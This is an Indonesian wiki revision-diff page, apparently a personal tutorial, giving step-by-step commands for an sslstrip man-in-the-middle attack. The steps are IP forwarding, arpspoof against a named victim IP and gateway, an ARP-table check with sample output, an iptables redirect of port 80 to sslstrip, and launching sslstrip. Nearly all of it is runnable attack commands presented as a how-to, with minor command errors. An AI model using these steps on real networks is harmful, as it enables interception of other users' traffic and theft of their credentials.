Difference between revisions of "MITM: sslstrip"

From OnnoWiki
Jump to navigation Jump to search
Line 13: Line 13:
 
  echo “1” > /proc/sys/net/ipv4/ip_forward
 
  echo “1” > /proc/sys/net/ipv4/ip_forward
 
   
 
   
 
 
lakukan arpspoof,
 
lakukan arpspoof,
  
 
  arpspoof -i eth0 -t victimip routerip
 
  arpspoof -i eth0 -t victimip routerip
  
  arpspoof -t eth0 -t 192.168.109.18 192.168.109.2
+
  arpspoof -t eth0 -t 192.168.0.106 192.168.0.100
  192.168.109.18 = ip victim
+
  192.168.0.106 = ip victim
  192.168.109.= ip router / gateway
+
  192.168.0.100 = ip router / gateway / server yang akan di monitor
 +
 
 +
Cek apakah berhasil, arp -n di 192.168.0.106
 +
 
 +
arp -n
 +
Address                  HWtype  HWaddress          Flags Mask            Iface
 +
192.168.0.13            ether  ec:a8:6b:f8:2e:fc  C                    enp3s0
 +
192.168.0.223            ether  d0:04:92:19:cc:38  C                    enp3s0
 +
192.168.0.7              ether  4c:e6:76:1f:15:4c  C                    enp3s0
 +
192.168.0.100            ether  66:31:65:39:62:38  C                    enp3s0
 +
 
 +
Setelah arpspoof di jalankan, lakukan arp -n
 +
 
 +
 
  
 
 
redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip).
 
redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip).
  

Revision as of 16:40, 4 April 2017

Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/


Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.

Cek routing,

route -n
netstat -nr

enable forward paket,

echo “1” > /proc/sys/net/ipv4/ip_forward

lakukan arpspoof,

arpspoof -i eth0 -t victimip routerip
arpspoof -t eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = ip victim
192.168.0.100 = ip router / gateway / server yang akan di monitor

Cek apakah berhasil, arp -n di 192.168.0.106

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   66:31:65:39:62:38   C                     enp3s0

Setelah arpspoof di jalankan, lakukan arp -n


redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip).

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000

Jalankan sslstrip agar listen pada port 1000

sslstrip -l 1000
python sslstrip.pl –l 1000



Referensi